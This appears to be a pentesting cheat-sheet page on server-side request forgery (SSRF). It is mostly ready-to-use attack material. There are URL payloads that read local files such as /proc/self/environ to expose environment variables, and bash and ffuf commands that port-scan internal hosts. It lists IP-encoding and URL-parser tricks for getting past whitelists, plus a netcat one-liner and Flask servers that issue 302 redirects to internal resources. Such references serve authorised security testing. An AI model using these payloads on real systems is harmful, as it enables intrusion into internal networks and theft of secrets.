SSRF

Server-Side Request Forgery.

It occurs when an application accepts input from the user (URL, GET, POST, HEADER, PARAMETER, etc.), which is not properly verified, to make HTTP requests to another internal or external resource.

Types: In-Band and Blind.

Payload

URL validation bypass

Remote files

http://<TARGET>/load?q=http://<IP>:<PORT>

Local files

http://<TARGET>/load?q=file://<ABSOLUTE_PATH>
http://<TARGET>/load?q=file:///proc/self/environ  # environment variables, like pwd

Port Scanning

for port in {1..65535};do echo $port >> ports.txt; done

curl -i -s "http://<TARGET_IP>/load?q=http://127.0.0.1:1”
# recovery length closed door

ffuf -w ./ports.txt:PORT -u "http://<TARGET_IP>/load?q=http://127.0.0.1:PORT" -fs 30

Encoding IP

Abbreviations

127.1

Decimal

2130706433

Octal

0177.0000.0000.0001 (017700000001)

http://127.0.0.1#@whitelist.net
http://127.0.0.1%23@whitelist.net
http://127.0.0.1%2523@whitelist.net
http://whitelist.net#@127.0.0.1
http://whitelist.net%23@127.0.0.1
http://whitelist.net%2523@127.0.0.1

HTTP Redirection

Server Redirection

echo -e "HTTP/1.1 302 Found\nLocation: <TARGET_SITE>\n" | nc -lnvp 80

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def redirect_to_new_page():
    return redirect('<TARGET_SITE>', code=302)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

from flask import Flask, redirect, make_response

app = Flask(__name__)

@app.route('/')
def index():
    # Create a response with a redirect and set the desired content type.
    response = make_response(redirect('http://0.0.0.0/internal.php'))
    response.headers['Content-Type'] = 'image/png'
    return response

if __name__ == '__main__':
    app.run(debug=True)

DNS Rebinding

Set up a DNS server that performs constant switching between two IPs. Use Rebinder, set up the two ip's for continuous switching, get the domain to use.

Inconsistencies on URL Parser

A New Era of SSRF - Black Hat USA 2017

Last updated 6 months ago

Was this helpful?